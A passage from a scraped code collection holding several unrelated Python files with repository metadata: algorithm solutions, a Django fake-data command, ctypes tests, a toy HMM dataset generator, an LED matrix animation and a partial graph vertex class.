dp[i] = maxpoint + n * c
else:
dp[i] = max(maxpoint, dp[i - 1]) + n * c
maxpoint = max(maxpoint, dp[i - 1])
return max(dp[-1], maxpoint)
    #Attempt to optimize space to O(1) -- actually still O(n), because count is stored
def deleteAndEarn2(self, nums):
count = sorted(Counter(nums).items(), key = lambda x: x[0])
cur, pre, mp = 0, 0, 0
for i, (n, c) in enumerate(count):
cur = (mp if n - 1 == count[i - 1][0] else max(mp, pre)) + n * c
mp, pre = max(mp, pre), cur
return max(cur, mp)
nums = [1,1,1,2,4,5,5,5,6]
solute = Solution()
res = solute.deleteAndEarn(nums)
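# Sanity check: the optimum for this input is 18 (take all three 5s for 15, then the 1s for 3).
print(res)  # -> 18
assert res == solute.deleteAndEarn2(nums) == 18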
|
[
"[email protected]"
] | |
171ed97b60c4f2239961de9c02cdc8a7beeb2300
|
8981902427dc577228dfd5611c6afe86c3e2e9e2
|
/dsmr_stats/management/commands/dsmr_stats_fake_development_data.py
|
0539470d7d311df505ea9ed974563875060356e9
|
[] |
no_license
|
genie137/dsmr-reader
|
5515f4f92bb05bcf00f0e8a0fbd1a018d408950b
|
4d934b4838cb2de4a66ff193f4f3095e9beecd99
|
refs/heads/master
| 2020-03-21T18:14:05.182137 | 2018-06-12T14:54:55 | 2018-06-12T14:54:55 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,248 |
py
|
from decimal import Decimal
from time import sleep
import random
from django.core.management.base import BaseCommand, CommandError
from django.utils.translation import ugettext as _
from django.conf import settings
from django.db import models
from dsmr_stats.models.statistics import DayStatistics, HourStatistics
from dsmr_consumption.models.consumption import ElectricityConsumption
from dsmr_datalogger.models.reading import DsmrReading
class Command(BaseCommand):
help = _('Alters any stats generate to fake data. DO NOT USE in production! Used for integration checks.')
def add_arguments(self, parser):
super(Command, self).add_arguments(parser)
parser.add_argument(
'--ack-to-mess-up-my-data',
action='store_true',
dest='acked_warning',
default=False,
help=_('Required option to acknowledge you that you WILL mess up your data with this.')
)
def handle(self, **options):
""" InfiniteManagementCommandMixin listens to handle() and calls run() in a loop. """
if not settings.DEBUG:
raise CommandError(_('Intended usage is NOT production! Only allowed when DEBUG = True'))
if not options.get('acked_warning'):
raise CommandError(_('Intended usage is NOT production! Force by using --ack-to-mess-up-my-data'))
self._randomize()
def _randomize(self):
""" Generates 'random' stats data by altering existing ones. """
factor = Decimal(random.random()) # Between 0.0 and 1.0, change every day.
print('Using existing consumption as base, multiplied by {}'.format(factor))
sleep(1) # Allow to abort when random number sucks.
print('Altering readings... (might take quite some time)')
DsmrReading.objects.all().order_by('-pk').update(
electricity_returned_1=models.F('electricity_delivered_1') * factor,
electricity_returned_2=models.F('electricity_delivered_2') * factor,
electricity_currently_returned=models.F('electricity_currently_delivered') * factor,
)
print('Altering electricity consumption... (might take quite some time as well)')
ElectricityConsumption.objects.all().update(
returned_1=models.F('delivered_1') * factor,
returned_2=models.F('delivered_2') * factor,
currently_returned=models.F('currently_delivered') * factor,
phase_currently_delivered_l1=models.F('currently_delivered') * factor, # Split.
phase_currently_delivered_l2=models.F('currently_delivered') * (1 - factor), # Remainder of split.
phase_currently_delivered_l3=0.005, # Weird constant, to keep it simple.
)
print('Altering hour statistics...')
HourStatistics.objects.all().update(
electricity1_returned=models.F('electricity1') * factor,
electricity2_returned=models.F('electricity2') * factor,
)
print('Altering day statistics...')
DayStatistics.objects.all().update(
electricity1_returned=models.F('electricity1') * factor,
electricity2_returned=models.F('electricity2') * factor,
)
print('Done!')
|
[
"[email protected]"
] | |
dfa2a73bf800f4035448f9edb1d2a68fba40626f
|
344dfd891cde88940c86f1d488d426c79c3825ac
|
/w10/G3/test3/myenv/bin/easy_install-2.7
|
98dbd04132e797effef22e10a48cc7c95dd3956e
|
[] |
no_license
|
bobur554396/WT2018Spring
|
b32b02d4ffdc1598fb41322e97cecc0eeffa92b3
|
6a79748747991aa1e28b359a72ddf3a9b3a9d1d0
|
refs/heads/master
| 2021-05-11T00:53:05.640173 | 2018-04-13T05:12:33 | 2018-04-13T05:12:33 | 118,312,848 | 3 | 4 | null | null | null | null |
UTF-8
|
Python
| false | false | 276 |
7
|
#!/Users/bobur/Desktop/work/django/WT/test3/myenv/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
|
[
"[email protected]"
] | |
2edcd772211818912e2e90300d4d51ee3e1717dc
|
b84842cfa24fce5b1a8d093bdf45885b0f5ab434
|
/configuration/appcaching/main.py
|
f45cc7805c1e496dbdcc9f2b7eef110336613c36
|
[] |
no_license
|
CodedQuen/Programming-Google-App-Engine
|
fc0f4572a60f3d91f08a15f2b2d19d71673d2de6
|
bd3430b84db6477737a7332a358ed37a6ea36b23
|
refs/heads/master
| 2022-04-25T01:14:08.620872 | 2020-04-30T07:02:26 | 2020-04-30T07:02:26 | 260,136,667 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 1,873 |
py
|
import datetime
import webapp2
# An app instance global.
app_counter = 0
class MainPage(webapp2.RequestHandler):
# A class variable.
cls_counter = 0
def __init__(self, *args, **kwargs):
super(MainPage, self).__init__(*args, **kwargs)
# A handler instance variable.
self.counter = 0
def incr_and_print_counter(self):
global app_counter
app_counter += 1
MainPage.cls_counter += 1
self.counter += 1
self.response.write('<p>App counter: %d</p>' % app_counter)
self.response.write('<p>Class counter: %d</p>' % MainPage.cls_counter)
self.response.write('<p>Object counter: %d</p>' % self.counter)
def get(self):
self.response.write('''
<p>This request handler accesses and modifies three counter variables: a module global, a class global, and an handler object member. When App Engine starts a new instance for an app, its memory begins empty. The first request handled by a request handler on the instance imports the <code>main</code> module, which initializes the module global and class global to zero (0). App Engine constructs a new instance of the <code>MainPage</code> class for each request, which initializes its instance member counter.</p>
<p>When you reload this page, the module and class globals may change depending on which instance handles your request, and how many previous requests the instance has handled. This number may fluctuate as new instances are started and requests are distributed across live instances. The object counter remains at 1, because each request gets its own handler object.</p>
''')
self.incr_and_print_counter()
self.response.write('<p>The time is: %s</p>' % str(datetime.datetime.now()))
app = webapp2.WSGIApplication([('/', MainPage)], debug=True)
|
[
"[email protected]"
] | |
5797591605f22b2b07de9070a65a6a233fa70ace
|
38dc3ab929bcc9845a88ce1e210cec1025c1d962
|
/src/learntocut/libs/cwrapping/__init__.py
|
2f27ff9fcff5cd481ab67286e02128e459bd6354
|
[] |
no_license
|
suysh-msra/OResearch
|
c58403b46a028b9a1be9ed9d4b47fa8bb152fefb
|
ef51c9871b8222c26b62e22d3ed550a0d069c11d
|
refs/heads/master
| 2023-03-22T09:08:38.929830 | 2021-03-15T14:47:04 | 2021-03-15T14:47:04 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 108 |
py
|
#try:
# import gurobicpy
#except:
# from . import gurobicpy
#from rlip.envs.cwrapping import gurobicpy
|
[
"[email protected]"
] | |
edf57439c76d8c1b3d592074a699e34cfd4a5ac4
|
acd41dc7e684eb2e58b6bef2b3e86950b8064945
|
/res/packages/scripts/scripts/common/Lib/ctypes/test/test_cfuncs.py
|
1dd0e756e4abd4e16f874e05426342163b9b7036
|
[] |
no_license
|
webiumsk/WoT-0.9.18.0
|
e07acd08b33bfe7c73c910f5cb2a054a58a9beea
|
89979c1ad547f1a1bbb2189f5ee3b10685e9a216
|
refs/heads/master
| 2021-01-20T09:37:10.323406 | 2017-05-04T13:51:43 | 2017-05-04T13:51:43 | 90,268,530 | 0 | 0 | null | null | null | null |
WINDOWS-1250
|
Python
| false | false | 7,850 |
py
|
# 2017.05.04 15:31:23 Central Europe (daylight saving time)
# Embedded file name: scripts/common/Lib/ctypes/test/test_cfuncs.py
import unittest
from ctypes import *
import _ctypes_test
class CFunctions(unittest.TestCase):
_dll = CDLL(_ctypes_test.__file__)
def S(self):
return c_longlong.in_dll(self._dll, 'last_tf_arg_s').value
def U(self):
return c_ulonglong.in_dll(self._dll, 'last_tf_arg_u').value
def test_byte(self):
self._dll.tf_b.restype = c_byte
self._dll.tf_b.argtypes = (c_byte,)
self.assertEqual(self._dll.tf_b(-126), -42)
self.assertEqual(self.S(), -126)
def test_byte_plus(self):
self._dll.tf_bb.restype = c_byte
self._dll.tf_bb.argtypes = (c_byte, c_byte)
self.assertEqual(self._dll.tf_bb(0, -126), -42)
self.assertEqual(self.S(), -126)
def test_ubyte(self):
self._dll.tf_B.restype = c_ubyte
self._dll.tf_B.argtypes = (c_ubyte,)
self.assertEqual(self._dll.tf_B(255), 85)
self.assertEqual(self.U(), 255)
def test_ubyte_plus(self):
self._dll.tf_bB.restype = c_ubyte
self._dll.tf_bB.argtypes = (c_byte, c_ubyte)
self.assertEqual(self._dll.tf_bB(0, 255), 85)
self.assertEqual(self.U(), 255)
def test_short(self):
self._dll.tf_h.restype = c_short
self._dll.tf_h.argtypes = (c_short,)
self.assertEqual(self._dll.tf_h(-32766), -10922)
self.assertEqual(self.S(), -32766)
def test_short_plus(self):
self._dll.tf_bh.restype = c_short
self._dll.tf_bh.argtypes = (c_byte, c_short)
self.assertEqual(self._dll.tf_bh(0, -32766), -10922)
self.assertEqual(self.S(), -32766)
def test_ushort(self):
self._dll.tf_H.restype = c_ushort
self._dll.tf_H.argtypes = (c_ushort,)
self.assertEqual(self._dll.tf_H(65535), 21845)
self.assertEqual(self.U(), 65535)
def test_ushort_plus(self):
self._dll.tf_bH.restype = c_ushort
self._dll.tf_bH.argtypes = (c_byte, c_ushort)
self.assertEqual(self._dll.tf_bH(0, 65535), 21845)
self.assertEqual(self.U(), 65535)
def test_int(self):
self._dll.tf_i.restype = c_int
self._dll.tf_i.argtypes = (c_int,)
self.assertEqual(self._dll.tf_i(-2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_int_plus(self):
self._dll.tf_bi.restype = c_int
self._dll.tf_bi.argtypes = (c_byte, c_int)
self.assertEqual(self._dll.tf_bi(0, -2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_uint(self):
self._dll.tf_I.restype = c_uint
self._dll.tf_I.argtypes = (c_uint,)
self.assertEqual(self._dll.tf_I(4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_uint_plus(self):
self._dll.tf_bI.restype = c_uint
self._dll.tf_bI.argtypes = (c_byte, c_uint)
self.assertEqual(self._dll.tf_bI(0, 4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_long(self):
self._dll.tf_l.restype = c_long
self._dll.tf_l.argtypes = (c_long,)
self.assertEqual(self._dll.tf_l(-2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_long_plus(self):
self._dll.tf_bl.restype = c_long
self._dll.tf_bl.argtypes = (c_byte, c_long)
self.assertEqual(self._dll.tf_bl(0, -2147483646), -715827882)
self.assertEqual(self.S(), -2147483646)
def test_ulong(self):
self._dll.tf_L.restype = c_ulong
self._dll.tf_L.argtypes = (c_ulong,)
self.assertEqual(self._dll.tf_L(4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_ulong_plus(self):
self._dll.tf_bL.restype = c_ulong
self._dll.tf_bL.argtypes = (c_char, c_ulong)
self.assertEqual(self._dll.tf_bL(' ', 4294967295L), 1431655765)
self.assertEqual(self.U(), 4294967295L)
def test_longlong(self):
self._dll.tf_q.restype = c_longlong
self._dll.tf_q.argtypes = (c_longlong,)
self.assertEqual(self._dll.tf_q(-9223372036854775806L), -3074457345618258602L)
self.assertEqual(self.S(), -9223372036854775806L)
def test_longlong_plus(self):
self._dll.tf_bq.restype = c_longlong
self._dll.tf_bq.argtypes = (c_byte, c_longlong)
self.assertEqual(self._dll.tf_bq(0, -9223372036854775806L), -3074457345618258602L)
self.assertEqual(self.S(), -9223372036854775806L)
def test_ulonglong(self):
self._dll.tf_Q.restype = c_ulonglong
self._dll.tf_Q.argtypes = (c_ulonglong,)
self.assertEqual(self._dll.tf_Q(18446744073709551615L), 6148914691236517205L)
self.assertEqual(self.U(), 18446744073709551615L)
def test_ulonglong_plus(self):
self._dll.tf_bQ.restype = c_ulonglong
self._dll.tf_bQ.argtypes = (c_byte, c_ulonglong)
self.assertEqual(self._dll.tf_bQ(0, 18446744073709551615L), 6148914691236517205L)
self.assertEqual(self.U(), 18446744073709551615L)
def test_float(self):
self._dll.tf_f.restype = c_float
self._dll.tf_f.argtypes = (c_float,)
self.assertEqual(self._dll.tf_f(-42.0), -14.0)
self.assertEqual(self.S(), -42)
def test_float_plus(self):
self._dll.tf_bf.restype = c_float
self._dll.tf_bf.argtypes = (c_byte, c_float)
self.assertEqual(self._dll.tf_bf(0, -42.0), -14.0)
self.assertEqual(self.S(), -42)
def test_double(self):
self._dll.tf_d.restype = c_double
self._dll.tf_d.argtypes = (c_double,)
self.assertEqual(self._dll.tf_d(42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_double_plus(self):
self._dll.tf_bd.restype = c_double
self._dll.tf_bd.argtypes = (c_byte, c_double)
self.assertEqual(self._dll.tf_bd(0, 42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_longdouble(self):
self._dll.tf_D.restype = c_longdouble
self._dll.tf_D.argtypes = (c_longdouble,)
self.assertEqual(self._dll.tf_D(42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_longdouble_plus(self):
self._dll.tf_bD.restype = c_longdouble
self._dll.tf_bD.argtypes = (c_byte, c_longdouble)
self.assertEqual(self._dll.tf_bD(0, 42.0), 14.0)
self.assertEqual(self.S(), 42)
def test_callwithresult(self):
def process_result(result):
return result * 2
self._dll.tf_i.restype = process_result
self._dll.tf_i.argtypes = (c_int,)
self.assertEqual(self._dll.tf_i(42), 28)
self.assertEqual(self.S(), 42)
self.assertEqual(self._dll.tf_i(-42), -28)
self.assertEqual(self.S(), -42)
def test_void(self):
self._dll.tv_i.restype = None
self._dll.tv_i.argtypes = (c_int,)
self.assertEqual(self._dll.tv_i(42), None)
self.assertEqual(self.S(), 42)
self.assertEqual(self._dll.tv_i(-42), None)
self.assertEqual(self.S(), -42)
return
try:
WinDLL
except NameError:
pass
else:
class stdcall_dll(WinDLL):
def __getattr__(self, name):
if name[:2] == '__' and name[-2:] == '__':
raise AttributeError(name)
func = self._FuncPtr(('s_' + name, self))
setattr(self, name, func)
return func
class stdcallCFunctions(CFunctions):
_dll = stdcall_dll(_ctypes_test.__file__)
if __name__ == '__main__':
unittest.main()
# okay decompyling C:\Users\PC\wotmods\files\originals\res\packages\scripts\scripts\common\Lib\ctypes\test\test_cfuncs.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2017.05.04 15:31:23 Central Europe (daylight saving time)
|
[
"[email protected]"
] | |
4bf4f653d1613c7c86df9e27f28d4e409cace30d
|
5006a6965c21e5b828300eedf907eb55ec5b8b27
|
/bnpy/datasets/zzz_unsupported/SeqOfBinBars9x9.py
|
27e0894613c7097a982c3c7cb0276837370c30f6
|
[
"BSD-3-Clause"
] |
permissive
|
birlrobotics/bnpy
|
1804d0fed9c3db4c270f4cd6616b30323326f1ec
|
8f297d8f3e4a56088d7755134c329f63a550be9e
|
refs/heads/master
| 2021-07-09T14:36:31.203450 | 2018-02-09T07:16:41 | 2018-02-09T07:16:41 | 96,383,050 | 3 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,831 |
py
|
'''
SeqOfBinBars9x9.py
Binary toy bars data, with a 9x9 grid,
so each observation is a vector of size 81.
There are K=20 true topics
* one common background topic (with prob of 0.05 for all pixels)
* one rare foreground topic (with prob of 0.90 for all pixels)
* 18 bar topics, one for each row/col of the grid.
The basic idea is that the background topic is by far most common.
It takes over 50% of all timesteps.
The horizontal bars and the vertical bars form coherent groups,
where we transition between each bar (1-9) in a standard step-by-step way.
The rare foreground topic simulates the rare "artificial" phenomena
reported by some authors, of unusual all-marks-on bursts in chr data.
'''
import os
import sys
import scipy.io
import numpy as np
from bnpy.data import GroupXData
from bnpy.util import as1D
K = 20 # Number of topics
D = 81 # Vocabulary Size
bgStateID = 18
fgStateID = 19
Defaults = dict()
Defaults['nDocTotal'] = 50
Defaults['T'] = 10000
Defaults['bgProb'] = 0.05
Defaults['fgProb'] = 0.90
Defaults['seed'] = 8675309
Defaults['maxTConsec'] = Defaults['T'] / 5.0
def get_data(**kwargs):
''' Create dataset as bnpy DataObj object.
'''
Data = generateDataset(**kwargs)
Data.name = 'SeqOfBinBars9x9'
Data.summary = 'Binary Bar Sequences with %d true topics.' % (K)
return Data
def makePi(stickyProb=0.95, extraStickyProb=0.9999,
**kwargs):
''' Make phi matrix that defines probability of each pixel.
'''
pi = np.zeros((K, K))
# Horizontal bars
for k in xrange(9):
pi[k, k] = stickyProb
if k == 8:
pi[k, bgStateID] = 1 - stickyProb
else:
pi[k, (k + 1) % 9] = 1 - stickyProb
# Vertical bars
for k in xrange(9, 18):
pi[k, k] = stickyProb
if k == 17:
pi[k, bgStateID] = 1 - stickyProb
else:
pi[k, 9 + (k + 1) % 9] = 1 - stickyProb
pi[bgStateID, :] = 0.0
pi[bgStateID, bgStateID] = extraStickyProb
pi[bgStateID, 0] = 5.0 / 12 * (1 - extraStickyProb)
pi[bgStateID, 9] = 5.0 / 12 * (1 - extraStickyProb)
pi[bgStateID, fgStateID] = 2.0 / 12 * (1 - extraStickyProb)
mstickyProb = 0.5 * (stickyProb + extraStickyProb)
pi[fgStateID, :] = 0.0
pi[fgStateID, fgStateID] = mstickyProb
pi[fgStateID, bgStateID] = 1 - mstickyProb
assert np.allclose(1.0, np.sum(pi, 1))
return pi
def makePhi(fgProb=0.75, bgProb=0.05, **kwargs):
''' Make phi matrix that defines probability of each pixel.
'''
phi = bgProb * np.ones((K, np.sqrt(D), np.sqrt(D)))
for k in xrange(18):
if k < 9:
rowID = k
# Horizontal bars
phi[k, rowID, :] = fgProb
else:
colID = k - 9
phi[k, :, colID] = fgProb
phi[-2, :, :] = bgProb
phi[-1, :, :] = fgProb
phi = np.reshape(phi, (K, D))
return phi
def generateDataset(**kwargs):
for key in Defaults:
if key not in kwargs:
kwargs[key] = Defaults[key]
phi = makePhi(**kwargs)
transPi = makePi(**kwargs)
PRNG = np.random.RandomState(kwargs['seed'])
nSeq = kwargs['nDocTotal']
T_in = kwargs['T']
if isinstance(T_in, str):
Tvals = [int(T) for T in T_in.split(',')]
else:
Tvals = [T_in]
if len(Tvals) == 1:
seqLens = Tvals[0] * np.ones(nSeq, dtype=np.int32)
elif len(Tvals) < nSeq:
seqLens = np.tile(Tvals, nSeq)[:nSeq]
elif len(Tvals) >= nSeq:
seqLens = np.asarray(Tvals, dtype=np.int32)[:nSeq]
doc_range = np.hstack([0, np.cumsum(seqLens)])
N = doc_range[-1]
allX = np.zeros((N, D))
allZ = np.zeros(N, dtype=np.int32)
startStates = [bgStateID, fgStateID]
states0toKm1 = np.arange(K)
# Each iteration generates one time-series/sequence
# with starting state deterministically rotating among all states
for i in xrange(nSeq):
start = doc_range[i]
stop = doc_range[i + 1]
T = stop - start
Z = np.zeros(T, dtype=np.int32)
X = np.zeros((T, D))
nConsec = 0
Z[0] = startStates[i % len(startStates)]
X[0] = PRNG.rand(D) < phi[Z[0]]
for t in xrange(1, T):
if nConsec > kwargs['maxTConsec']:
# Force transition if we've gone on too long
transPi_t = transPi[Z[t - 1]].copy()
transPi_t[Z[t - 1]] = 0
transPi_t /= transPi_t.sum()
else:
transPi_t = transPi[Z[t - 1]]
Z[t] = PRNG.choice(states0toKm1, p=transPi_t)
X[t] = PRNG.rand(D) < phi[Z[t]]
if Z[t] == Z[t - 1]:
nConsec += 1
else:
nConsec = 0
allZ[start:stop] = Z
allX[start:stop] = X
TrueParams = dict()
TrueParams['beta'] = np.mean(transPi, axis=0)
TrueParams['phi'] = phi
TrueParams['Z'] = allZ
TrueParams['K'] = K
return GroupXData(allX, doc_range=doc_range, TrueParams=TrueParams)
DefaultOutputDir = os.path.join(
os.environ['XHMMROOT'], 'datasets', 'SeqOfBinBars9x9')
def saveDatasetToDisk(outputdir=DefaultOutputDir):
''' Save dataset to disk for scalable experiments.
'''
Data = get_data()
for k in xrange(K):
print 'N[%d] = %d' % (k, np.sum(Data.TrueParams['Z'] == k))
# Save it as batches
nDocPerBatch = 2
nBatch = Data.nDocTotal // nDocPerBatch
for batchID in xrange(nBatch):
mask = np.arange(batchID * nDocPerBatch, (batchID + 1) * nDocPerBatch)
Dbatch = Data.select_subset_by_mask(mask, doTrackTruth=1)
outmatpath = os.path.join(
outputdir,
'batches/batch%02d.mat' %
(batchID))
Dbatch.save_to_mat(outmatpath)
with open(os.path.join(outputdir, 'batches/Info.conf'), 'w') as f:
f.write('datasetName = SeqOfBinBars9x9\n')
f.write('nBatchTotal = %d\n' % (nBatch))
f.write('nDocTotal = %d\n' % (Data.nDocTotal))
Dsmall = Data.select_subset_by_mask([0, 1], doTrackTruth=1)
Dsmall.save_to_mat(os.path.join(outputdir, 'HMMdataset.mat'))
if __name__ == '__main__':
import scipy.io
import bnpy.viz.BernViz as BernViz
# saveDatasetToDisk()
# BernViz.plotCompsAsSquareImages(Data.TrueParams['phi'])
Data = get_data(nDocTotal=2)
pylab = BernViz.pylab
pylab.subplots(nrows=1, ncols=Data.nDoc)
for d in xrange(2):
start = Data.doc_range[d]
stop = Data.doc_range[d + 1]
pylab.subplot(1, Data.nDoc, d + 1)
Xim = Data.X[start:stop]
pylab.imshow(Xim,
interpolation='nearest', cmap='bone',
aspect=Xim.shape[1] / float(Xim.shape[0]),
)
pylab.ylim([np.minimum(stop - start, 5000), 0])
pylab.show(block=True)
|
[
"[email protected]"
] | |
8a51add4f7cac897e5689c2db9965056e5429db9
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p02684/s383863332.py
|
cee048d87cd74a0e9eb30d0721462d9b668e3bb4
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 620 |
py
|
N, K = map(int, input().split())
A = list(map(int, input().split()))
visited = [0 for _ in range(N)]      # times each town has been entered
first_visit = [0 for _ in range(N)]  # step at which each town was first reached
now = 0
flag = True
# Simulate enough steps (5 * 10^5 >= N) to be sure we are inside the cycle.
for i in range(10 ** 5 * 5):
    if first_visit[now] == 0:
        first_visit[now] = i
    visited[A[now] - 1] += 1
    now = A[now] - 1
    if i == K - 1:
        # K is small enough to simulate directly.
        print(now + 1)
        flag = False
        break
if flag:
    # Towns entered more than twice lie on the cycle, so num is the cycle length.
    num = 0
    for i in range(N):
        if visited[i] > 2:
            num += 1
    # Answer: the cycle town whose first-visit step matches K modulo the cycle length.
    for i in range(N):
        if visited[i] >= 2:
            if K % num == first_visit[i] % num:
                print(i + 1)
                break
|
[
"[email protected]"
] | |
b31f8616e5f36658a3e7687d1080014d2b0a7da7
|
0c39d88b4cdd35c96be02573f804196721d88f52
|
/mentha/tests/persistent_settings.py
|
818c47a931bc6c7a1b7dd1227006db39ec15c0fa
|
[
"MIT"
] |
permissive
|
ateoto/django-mentha
|
7909e5ad989481fa57aa3336bcb98380c6e9e762
|
2b9aeba1f9a33ee76dca2e1f9436e964be2c2325
|
refs/heads/master
| 2016-09-06T13:59:49.994441 | 2014-06-10T23:45:30 | 2014-06-10T23:45:30 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 201 |
py
|
from .test_settings import * # NOQA
INSTALLED_APPS = EXTERNAL_APPS + INTERNAL_APPS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': 'db.sqlite',
}
}
|
[
"[email protected]"
] | |
16ea3f9021e49cc8cb94b0503223dd1a3ede9237
|
32a7a7663ce0c94dc7c6465e1a4b819145d17e87
|
/BiblioPixelAnimations/matrix/MathFunc.py
|
997fdced226c3f7c7b4c30d62bc9a1a0e66c1415
|
[
"MIT"
] |
permissive
|
CriticalTechGuy/BiblioPixelAnimations
|
04d08e1d41f374b63aa90956b3aeda2db6484d02
|
2a3a1671f289b21d7da316df1b5ca54d7f95a3b1
|
refs/heads/master
| 2020-03-26T06:24:12.460928 | 2018-04-19T10:17:21 | 2018-04-19T11:36:05 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,300 |
py
|
from bibliopixel.animation import BaseMatrixAnim
import bibliopixel.colors as colors
import random
import math
def hue_fade(a, b, val):
if a > b:
b = b + 360
return (a + ((b - a) * val)) % 360
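# Note: hue_fade interpolates on the hue circle, wrapping through 0;
# e.g. hue_fade(350, 10, 0.5) == 0.0 rather than 180.0.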
class MathFunc(BaseMatrixAnim):
funcs = [
lambda x, y, s: x + (x * y) + s,
lambda x, y, s: x * s + (x * y),
lambda x, y, s: x * y * s + s,
lambda x, y, s: x * y - math.log(s + 1) + s,
lambda x, y, s: math.cos(0.5 * x) * y + s,
lambda x, y, s: math.cos(x * y) * y + s,
lambda x, y, s: math.tan(y) * math.cos(x) + s,
lambda x, y, s: math.sin(y) + x * s,
lambda x, y, s: math.sin(x) + y * s,
lambda x, y, s: math.sin(x * y) + y * x + s,
lambda x, y, s: x * x - y * y + s,
lambda x, y, s: (x * y - y * y) + s,
lambda x, y, s: (x * y - y * y) % (s + 1),
lambda x, y, s: (y * y + x * x) + s,
lambda x, y, s: x * y * 2 - y * y * 2 + s,
lambda x, y, s: (x / (y + 1)) + (y * y) + s,
lambda x, y, s: ((x * x) / 2 * (y + 1)) + s,
lambda x, y, s: x * y * (x + y) + s,
lambda x, y, s: x * y * (s / (x + 1)),
lambda x, y, s: (x * x * x) - (y * y * 2) + s,
lambda x, y, s: x * 12 - y * 4 + s,
lambda x, y, s: math.log10(x + 1) * (y * 2) + s
]
def __init__(self, layout, frames_per=300, func=0, rand=True, fade_frames=30):
super().__init__(layout)
self.start_func = func
self.frames_per = frames_per
self.rand = rand
self.fade_frames = fade_frames
self.fade_step = 1.0 / fade_frames if fade_frames else 0.0
def pre_run(self):
self._step = 0
self.count = 0
self.fade_count = 0
self.cur_func = random.choice(range(len(self.funcs))) if self.rand else self.start_func
self.next_func = None
def call_func(self, func, x, y, s):
return abs(int(self.funcs[func](x, y, s))) % 360
def step(self, amt=1):
self.layout.all_off()
for y in range(self.height):
for x in range(self.width):
h = self.call_func(self.cur_func, x, y, self._step)
if self.next_func:
h_next = self.call_func(self.next_func, x, y, self._step)
h = hue_fade(h, h_next, self.fade_step * self.fade_count)
c = colors.hue2rgb_360(h)
self.layout.set(x, y, c)
if self.next_func:
self.fade_count += 1
if self.fade_count >= self.fade_frames:
self.cur_func = self.next_func
self.next_func = None
self.fade_count = 0
self.count = 0
else:
self.count += 1
if not self.next_func and self.frames_per and self.count >= self.frames_per:
if self.rand:
self.next_func = random.choice(range(len(self.funcs)))
else:
self.next_func = self.cur_func + 1
if self.next_func >= len(self.funcs):
self.next_func = 0
self.state = 2
self.count = 0
if not self.fade_frames:
self.cur_func = self.next_func
self.next_func = None
self._step += amt
|
[
"[email protected]"
] | |
35b54fd11d79356160dff0313c1e493c06a17499
|
a373cdb4107e099ce31eaa0f7620292c6154d860
|
/Metadata/dim_hierarchy_get_default_member.py
|
50ba4c0431c1f79885b4e68a9fe079d3313bcfa3
|
[
"MIT"
] |
permissive
|
jamiros/tm1py-samples
|
2a562337baebc2dcbbefd76d64c4c8f20e98810a
|
a398ae8744dcf19b5aa045a87d878bf18c903cc6
|
refs/heads/master
| 2022-02-23T14:42:22.404148 | 2019-10-01T21:32:10 | 2019-10-01T21:33:13 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 696 |
py
|
"""
When a dimension of a cube is not explicitly referenced in an MDX Query,
TM1 will implicitly use the DefaultMember for the missing dimension.
If no DefaultMember is defined in TM1, it will use the element with index 1.
You can use TM1py to query and update the default member for a Hierarchy
"""
import configparser
from TM1py.Services import TM1Service
config = configparser.ConfigParser()
config.read(r'..\config.ini')
with TM1Service(**config['tm1srv02']) as tm1:
current_default_member = tm1.dimensions.hierarchies.get_default_member(
dimension_name="Date",
hierarchy_name="Date")
print("Current default member for dimension Date: " + current_default_member)
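    # Hedged sketch: updating the default member. This assumes TM1py's
    # hierarchies service exposes update_default_member with this signature
    # (present in recent TM1py releases); the member name below is hypothetical.
    # tm1.dimensions.hierarchies.update_default_member(
    #     dimension_name="Date",
    #     hierarchy_name="Date",
    #     member_name="2019-12-31")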
|
[
"[email protected]"
] | |
c6861e3d4dca9db411a177f6608f52cfa4d48142
|
aac418419c2ef4d10c5c4ceb607d3d8329a5f395
|
/Algorithms/Graph/Topological_Sorting.py
|
a67d9eb485275425187fa875ad930ae3a719ff68
|
[] |
no_license
|
sudhirshahu51/projects
|
bb13395227355ff84933b6d3a0f158ee42bcdceb
|
b2d8331d14d2163b20535368a60c81f6c8bc2c8f
|
refs/heads/master
| 2021-01-01T17:09:18.654060 | 2017-04-24T10:46:15 | 2017-04-24T10:46:15 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,342 |
py
|
# To implement Topological Sorting for directed graph
# Topological Sorting: if there is path from u to v then u comes before v in ordering
class Vertex: # Class of vertex
def __init__(self, key):
self.id = key
self.connected = {} # dictionary of all the connected vertices with tht vertice
self.in_degree = 0
self.status = 'tmp'
def add_neighbor(self, nbr, weight=0): # adding a adjacent neighbour where nbr is vertex
self.connected[nbr] = weight
def __str__(self):
return str(self.id) + 'connected to' + str([x.id for x in self.connected])
def get_connections(self): # Get all the adjacent vertices
return self.connected.keys()
def get_id(self):
